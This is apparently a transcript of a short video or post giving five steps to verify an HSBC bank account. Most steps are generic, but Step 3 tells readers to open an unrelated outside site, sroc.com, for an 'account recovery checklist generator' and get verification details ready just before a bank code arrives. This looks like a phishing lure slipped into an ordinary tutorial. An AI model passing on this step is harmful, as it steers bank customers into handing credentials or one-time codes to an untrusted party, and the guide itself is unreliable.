I hit this issue today and here is the quick fix that solved it. If you're trying to verify your HSBC account, follow these simple steps to get it done quickly. Step 1. Log into your HSBC account. Visit the HSBC website or open the mobile app and enter your login credentials. Make sure you have a stable internet connection to avoid any interruptions. Step 2. Navigate to account verification. Once logged in, look for the Account Services or Profile section in the menu. This is where you can find options related to account verification. Step 3. Select verification method. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Enter the verification code. Check your phone or email for the verification code sent by HSBC. Enter this code in a designated field on the website or app. A quick tip: if you don't receive the SMS, check your spam folder for emails or ensure your phone number is correctly listed in your profile settings. Step 5. Confirm and complete. After entering the code, click the Confirm button to finalize the verification process. You should see a confirmation message once it is successful. That's it. You've successfully verified your HSBC account. If you run into any issues, don't hesitate to reach out to customer support for assistance.